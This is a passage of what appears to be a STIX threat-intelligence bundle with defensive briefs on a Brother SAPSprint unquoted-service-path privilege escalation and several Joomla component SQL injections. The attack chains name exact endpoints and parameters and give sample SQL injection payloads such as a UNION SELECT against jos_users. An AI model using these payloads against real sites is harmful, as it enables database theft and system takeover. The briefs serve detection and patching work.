malicious executable designed to perform privilege escalation or maintain persistence, often named `Program.exe`.\n4.  **Payload Placement**: The malicious `Program.exe` is placed in a directory that will be checked first by the operating system due to the unquoted service path, such as `C:\\`.\n5.  **Service Restart/Trigger**: The attacker waits for the SAPSprint service to restart (e.g., during a system reboot) or forces a restart if they have the necessary permissions.\n6.  **Malicious Execution**: Upon service start, the operating system attempts to execute `C:\\Program.exe` (the malicious payload) instead of the legitimate service binary within `C:\\Program Files\\`.\n7.  **Privilege Escalation**: The malicious `Program.exe` executes with `LocalSystem` privileges, granting the attacker full control over the compromised system.\n\n## Impact\n\nSuccessful exploitation of CVE-2021-47985 leads to complete system compromise through local privilege escalation. An attacker gains `LocalSystem` privileges, which are the highest possible on a Windows operating system. This allows them to install rootkits, disable security software, create new administrative users, access and exfiltrate sensitive data, or deploy further malware such as ransomware without restriction. While the NVD entry does not specify observed victims or targeted sectors, any organization utilizing Brother SAPSprint 7.60 is potentially vulnerable to this attack, enabling an attacker to move laterally and persist within their network.\n\n## Recommendation\n\n*   **Patch CVE-2021-47985**: Immediately apply any available patches or updates from Brother for SAPSprint 7.60 to address the unquoted service path vulnerability.\n*   **Enforce Quoted Service Paths**: Implement a system-wide policy or script to ensure all service paths are properly quoted, especially those containing spaces. Review the `ImagePath` registry key for services.\n*   **Monitor Service-Related Activities**: Deploy the provided Sigma rules to detect suspicious `Program.exe` execution from the `services.exe` process and file creation of `Program.exe` in the `C:\\` directory.\n*   **Enable Detailed Process Logging**: Ensure Sysmon (Event ID 1) and other process creation logging sources are enabled to capture `Image`, `ParentImage`, and `CommandLine` details for comprehensive detection.\n",
      "published": "2026-06-19T16:08:44Z",
      "labels": [
        "privilege-escalation",
        "unquoted-service-path",
        "windows",
        "local-exploitation"
      ],
      "object_refs": [
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47985"
        },
        {
          "source_name": "reference",
          "url": "https://brother.com/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/50061"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/brother-sapsprint-unquoted-service-path-privilege-escalation"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--59c52414-a31a-5a91-89fb-230f29a3ddd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c9d82c7f-783e-531d-ae0f-f7d79abed61e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dfe4660f-f860-565b-9aab-c69e12024601",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c9d82c7f-783e-531d-ae0f-f7d79abed61e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1027",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23f7d054-208a-524c-bacb-cd8bccda058a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c9d82c7f-783e-531d-ae0f-f7d79abed61e",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Repositories",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3198c502-0c85-5ab2-8f82-913c6137d006",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c9d82c7f-783e-531d-ae0f-f7d79abed61e",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c9d82c7f-783e-531d-ae0f-f7d79abed61e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2017-20252: Joomla NextGen Editor SQL Injection",
      "description": "## Overview\n\nCVE-2017-20252 identifies a critical SQL injection vulnerability in Joomla NextGen Editor version 2.1.0. This flaw allows unauthenticated attackers to execute arbitrary SQL commands on the backend database by manipulating the `plname` parameter within a specific GET request. The vulnerability stems from improper neutralization of special elements used in SQL commands, making it possible for attackers to extract sensitive database information. While the CVE was published in June 2026, the vulnerability dates back to 2017, suggesting it may have been present in the wild for some time. Defenders using affected versions of Joomla with the NextGen Editor component are at risk of data breaches and unauthorized access to their database contents.\n\n## Attack Chain\n\n1.  **Discovery**: An unauthenticated attacker identifies a public-facing Joomla instance running the NextGen Editor component.\n2.  **Vulnerability Identification**: The attacker determines that the installed NextGen Editor component is version 2.1.0, which is known to be vulnerable to CVE-2017-20252.\n3.  **Payload Crafting**: The attacker constructs a malicious HTTP GET request targeting `index.php` with the specific parameters `option=com_nge\u0026view=config`.\n4.  **SQL Injection**: The attacker injects malicious SQL syntax (e.g., `' OR 1=1 -- -`, `UNION SELECT`) into the `plname` parameter within the crafted GET request.\n5.  **Server-Side Execution**: The vulnerable NextGen Editor component processes the request without properly sanitizing the `plname` parameter, leading to the execution of the injected SQL commands on the backend database.\n6.  **Information Disclosure**: The executed SQL commands return sensitive database information (such as user credentials, configuration data, or other proprietary information) within the HTTP response to the attacker.\n7.  **Data Exfiltration**: The attacker parses the HTTP response to extract the sensitive database information, achieving their objective of data exfiltration.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20252 grants unauthenticated attackers the ability to extract sensitive database information from the affected Joomla application. This can lead to severe consequences including data breaches involving customer data, intellectual property, or internal configuration details. The disclosure of such information can result in significant financial losses, reputational damage, regulatory fines, and compromise of user accounts which can be used for further attacks. The wide adoption of Joomla and its extensions means a significant number of organizations could be vulnerable if they are running the specified version of the NextGen Editor.\n\n## Recommendation\n\n*   Patch CVE-2017-20252 immediately by updating the Joomla NextGen Editor component to a version beyond 2.1.0 or by removing it if no longer needed.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts.\n*   Ensure webserver access logs are collected and ingested for the `webserver` logsource category, enabling detailed detection of malicious GET requests and SQL injection attempts.\n",
      "published": "2026-06-19T16:20:19Z",
      "labels": [
        "sqli",
        "web-vulnerability",
        "joomla",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20252"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extension/nextgen-editor/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/43365"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-nextgen-editor-sql-injection-via-plname-parameter"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7ac7e90e-4a24-5810-ae31-24ac3e946a1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3e5e07a5-f81f-55c5-b35e-725020161055",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb15a1b0-38b3-5d07-b8f2-d78e5bdcb59b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3e5e07a5-f81f-55c5-b35e-725020161055",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1552",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46741744-0e0e-5b0e-a61e-f839318fbfaa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3e5e07a5-f81f-55c5-b35e-725020161055",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3e5e07a5-f81f-55c5-b35e-725020161055",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2017-20253: Joomla! Component My Projects 2.0 SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2017-20253 details a critical SQL injection vulnerability affecting Joomla! Component My Projects version 2.0. This flaw enables unauthenticated attackers to execute arbitrary SQL queries against the backend database by injecting malicious code into the `VerAyari` parameter within crafted HTTP requests. The vulnerability, first published to NVD in June 2026, allows for the extraction of sensitive database contents, including user credentials, configuration data, and other critical system information. Successful exploitation could lead to unauthorized access to the web application's backend, potential privilege escalation, and further compromise of the underlying server infrastructure through data exfiltration.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a public-facing Joomla! instance running the My Projects 2.0 component.\n2.  The attacker crafts a specially malformed HTTP GET request targeting a vulnerable endpoint of the My Projects component.\n3.  Malicious SQL injection payloads are embedded within the `VerAyari` parameter in the URL query string of the HTTP request.\n4.  The Joomla! Component My Projects 2.0 processes the request without adequately sanitizing the input provided via the `VerAyari` parameter.\n5.  The injected SQL code is executed as part of the legitimate database query, bypassing the application's intended logic.\n6.  The backend database responds by including sensitive information (e.g., schema details, user hashes, credentials) within the HTTP response, often through error messages or manipulated query results.\n7.  The attacker parses the HTTP response to extract the exfiltrated sensitive data, such as administrator credentials or customer information.\n8.  The extracted data is then used for further unauthorized access, account takeover, or data exfiltration, achieving the attacker's objective.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20253 grants unauthenticated attackers the ability to dump the entire database contents, including sensitive information such as administrator credentials, user data, and system configurations. This can lead to full compromise of the Joomla! application, unauthorized access to user accounts, and potentially the underlying server if extracted credentials are reused or provide sufficient privileges. The high CVSS score of 8.2 reflects the severe confidentiality impact and the unauthenticated nature of the attack, posing a significant risk of data breaches and system compromise for organizations utilizing the vulnerable component.\n\n## Recommendation\n\n*   Deploy a Web Application Firewall (WAF) with updated rulesets to detect and block SQL injection attempts, specifically monitoring HTTP `GET` requests targeting the Joomla! Component My Projects and the `VerAyari` parameter as described in CVE-2017-20253.\n*   Monitor web server access logs for anomalous HTTP requests containing SQL injection payloads, particularly in query parameters, as indicated by the detection rules below.\n*   Implement the provided Sigma rules to your SIEM solution to detect exploitation attempts of CVE-2017-20253 in web server logs.\n*   If the Joomla! Component My Projects 2.0 is in use, verify if a patch or update is available from the vendor (Gegabyte or Joomla! extensions directory) that addresses CVE-2017-20253. If no patch exists, consider disabling or removing the component.\n",
      "published": "2026-06-19T16:21:28Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20253"
        },
        {
          "source_name": "reference",
          "url": "http://www.gegabyte.org/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/43358"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-my-projects-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2404896-2dd1-5a9f-9c39-238873d7ef9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c44f2dd6-2c4a-558c-bd94-91e5f7f04eed",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--517c6721-c823-5c2d-988d-f7130b64dd51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c44f2dd6-2c4a-558c-bd94-91e5f7f04eed",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--effeb72e-c231-5b61-91f6-bd33eb8b66d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c44f2dd6-2c4a-558c-bd94-91e5f7f04eed",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c44f2dd6-2c4a-558c-bd94-91e5f7f04eed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! User Bench Component SQL Injection (CVE-2017-20254)",
      "description": "## Overview\n\nCVE-2017-20254 identifies an SQL injection vulnerability in the Joomla! Component User Bench version 1.0. This flaw allows an unauthenticated attacker to execute arbitrary SQL queries against the underlying database. The vulnerability specifically lies in the `userid` parameter when accessed via the `option=com_userbench\u0026view=detail` GET request to `index.php`. Attackers can inject malicious SQL code, enabling them to bypass authentication, extract sensitive information such as user credentials, hashed passwords, and critical configuration data from the database. This vulnerability poses a significant risk to the confidentiality and integrity of Joomla! installations running the affected component.\n\n## Attack Chain\n\n1.  **Initial Access (Web Request)**: An unauthenticated attacker sends a crafted HTTP GET request to a vulnerable Joomla! instance running the User Bench 1.0 component.\n2.  **Vulnerability Exploitation (SQL Injection)**: The GET request targets `index.php` with parameters `option=com_userbench\u0026view=detail\u0026userid=`, where the `userid` parameter contains a malicious SQL injection payload (e.g., `' UNION SELECT user,password FROM jos_users-- -`).\n3.  **Database Query Manipulation**: The vulnerable component processes the `userid` parameter without proper sanitization, leading to the attacker's SQL payload being directly appended and executed within the backend database query.\n4.  **Information Disclosure**: The injected SQL query is designed to extract sensitive data from the database, such as user credentials (usernames, hashed passwords), configuration data, or other proprietary information.\n5.  **Data Exfiltration**: The results of the malicious SQL query are returned within the HTTP response, allowing the attacker to exfiltrate the sensitive database information.\n6.  **Impact (Potential)**: With the extracted credentials, the attacker could gain unauthorized access to the Joomla! administration panel or other connected systems, leading to further compromise, data modification, or service disruption.\n\n## Impact\n\nA successful exploitation of CVE-2017-20254 allows unauthenticated attackers to steal sensitive data from the affected Joomla! database. This includes user credentials, database schema, configuration settings, and other critical information. The compromise of credentials could lead to full administrative control over the Joomla! instance, enabling defacement, content manipulation, or the injection of malicious web shells for further system compromise. The severity of impact depends on the criticality of the data stored in the Joomla! database and its connectivity to other internal systems.\n\n## Recommendation\n\n*   Immediately remove or update the Joomla! Component User Bench to a version that patches CVE-2017-20254, as version 1.0 is vulnerable.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts of CVE-2017-20254.\n*   Ensure web server access logs are collected and ingested into your SIEM, specifically capturing full URI and query parameters, to allow the rules in this brief to function effectively.\n*   Review web server logs for suspicious GET requests containing SQL injection payloads as described in the Attack Chain.\n",
      "published": "2026-06-19T16:22:23Z",
      "labels": [
        "sqli",
        "joomla",
        "web-vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20254"
        },
        {
          "source_name": "reference",
          "url": "http://www.gegabyte.org/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/user-bench/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/43357"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-user-bench-sql-injection-via-userid"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--87709142-05a9-51d6-9404-7c43de3addbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7ead275-a5e8-5be2-ae28-a14e79231678",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8dd5dfcd-9c0f-50b2-9423-3155b094eb9a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7ead275-a5e8-5be2-ae28-a14e79231678",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c7ead275-a5e8-5be2-ae28-a14e79231678",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! Component JB Visa 1.0 SQL Injection (CVE-2017-20255)",
      "description": "## Overview\n\nCVE-2017-20255 describes an unauthenticated SQL injection vulnerability present in Joomla! Component JB Visa version 1.0. This flaw allows remote attackers to execute arbitrary SQL queries, posing a significant risk to the confidentiality of underlying database contents. Attackers can exploit this by sending specially crafted HTTP GET requests to the vulnerable `index.php` endpoint, targeting specific parameters like `option=com_bookpro` and `view=popup`. By injecting malicious SQL code into the `visatype` parameter, adversaries can bypass authentication and directly interact with the database. This enables the exfiltration of sensitive information, such as user credentials and full table contents, from the compromised Joomla! installation, potentially leading to further system compromise.\n\n## Attack Chain\n\n1.  **Initial Access (HTTP GET Request):** An unauthenticated attacker sends an HTTP GET request to the vulnerable Joomla! instance running Component JB Visa 1.0.\n2.  **Targeting Vulnerable Endpoint:** The GET request specifically targets the `/index.php` path with the URL query parameters `option=com_bookpro` and `view=popup` to access the vulnerable component.\n3.  **SQL Payload Injection:** The attacker injects malicious SQL code into the `visatype` parameter within the URL query string (e.g., `visatype=%27%20OR%201=1--%20`).\n4.  **Application Processing:** The Joomla! application, due to CVE-2017-20255, processes the HTTP request and incorporates the malicious `visatype` input directly into an SQL query without proper sanitization.\n5.  **Database Execution:** The backend database executes the attacker's arbitrary SQL query, including the injected malicious code.\n6.  **Information Exfiltration:** The executed SQL query retrieves sensitive database information, such as user credentials, hashed passwords, or entire table contents, which is then returned in the HTTP response body to the attacker.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20255 allows unauthenticated attackers to gain full access to the database underlying the Joomla! instance. This can lead to the complete compromise of sensitive organizational data, including user accounts, personal identifiable information (PII), and application-specific configurations. The exfiltration of credentials could facilitate lateral movement within the network or access to other systems. While no specific victim count or targeted sectors are provided, any organization utilizing the vulnerable Joomla! Component JB Visa 1.0 is at risk of severe data breaches and potential regulatory fines.\n\n## Recommendation\n\n*   **Patch CVE-2017-20255:** Immediately upgrade Joomla! Component JB Visa to a patched version or disable/remove the component if an upgrade is not available.\n*   **Deploy Sigma Rules:** Deploy the provided Sigma rules \"Detects CVE-2017-20255 Exploitation - Joomla JB Visa SQL Injection\" and \"Detect Generic SQL Injection Attempts in GET Requests\" to your SIEM and tune them for your environment.\n*   **Enable Webserver Logging:** Ensure comprehensive logging for HTTP requests (especially URL paths, query parameters, and methods) is enabled on your web servers to facilitate detection of the patterns used in the Sigma rules.\n",
      "published": "2026-06-19T16:24:01Z",
      "labels": [
        "sql-injection",
        "joomla",
        "web-vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20255"
        },
        {
          "source_name": "reference",
          "url": "http://joombooking.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jb-visa/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/43350"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-jb-visa-sql-injection-via-visatype"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1cd752f8-8f0a-5226-a221-fb2c3f7aed3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a897c549-d387-5f01-9ec3-63a3fb0f7837",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a215fbf4-94b1-56b8-815e-e6b949aaaf94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a897c549-d387-5f01-9ec3-63a3fb0f7837",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Network Medium",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e0fa9b3e-378e-5547-ba66-834994558f85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a897c549-d387-5f01-9ec3-63a3fb0f7837",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a897c549-d387-5f01-9ec3-63a3fb0f7837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2017-20256 - Joomla Survey Force Deluxe SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2017-20256 identifies a critical SQL injection vulnerability within Joomla Survey Force Deluxe component version 3.2.4. This flaw allows unauthenticated threat actors to remotely execute arbitrary SQL queries against the underlying database. The vulnerability specifically arises from insufficient sanitization of user-supplied input in the `invite` parameter during GET requests. Attackers can leverage this by crafting malicious SQL payloads within this parameter, leading to information disclosure. Exploitation grants adversaries the ability to extract sensitive data, including user credentials, configuration details, and other proprietary information stored in the database. This vulnerability poses a significant risk to organizations using the affected Joomla component, as successful exploitation can compromise the integrity and confidentiality of their web applications and backend data stores.\n\n## Attack Chain\n\n1.  **Reconnaissance**: Attacker identifies a Joomla instance running the vulnerable Survey Force Deluxe component (version 3.2.4 or earlier).\n2.  **Vulnerability Identification**: Attacker identifies that the `invite` parameter in the component's GET requests is susceptible to SQL injection.\n3.  **Payload Crafting**: Attacker crafts a malicious SQL payload designed to extract database information. This payload is URL-encoded for inclusion in a GET request.\n4.  **Initial Access (SQL Injection)**: Attacker sends an unauthenticated HTTP GET request to the vulnerable Joomla endpoint, embedding the crafted SQL payload within the `invite` parameter (e.g., `index.php?option=com_surveyforce\u0026task=view\u0026invite=[SQL_PAYLOAD]`).\n5.  **Database Query Execution**: The vulnerable component processes the request without proper input sanitization, leading to the execution of the attacker's arbitrary SQL query on the backend database.\n6.  **Data 